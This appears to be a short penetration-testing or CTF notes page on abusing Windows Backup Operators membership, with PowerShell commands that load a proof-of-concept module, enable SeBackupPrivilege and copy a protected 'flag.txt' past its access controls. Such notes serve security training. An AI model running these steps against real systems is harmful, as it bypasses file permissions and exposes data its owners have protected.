Backup Operators

About

Membership of this group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

We can use this PoC [LINK] to exploit the SeBackupPrivilege, and copy forbidden files.

Importing Required Libraries

PS C:\> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\> Import-Module .\SeBackupPrivilegeCmdLets.dll

Enabling SeBackupPrivilege

PS C:\> Set-SeBackupPrivilege
PS C:\> whoami /priv # verifying
PS C:\> Get-SeBackupPrivilege # verifying

Copying a Protected File

PS C:\> Copy-FileSeBackupPrivilege 'C:\Users\venator17\flag.txt' .\flag.txt
PS C:\> cat .\flag.txt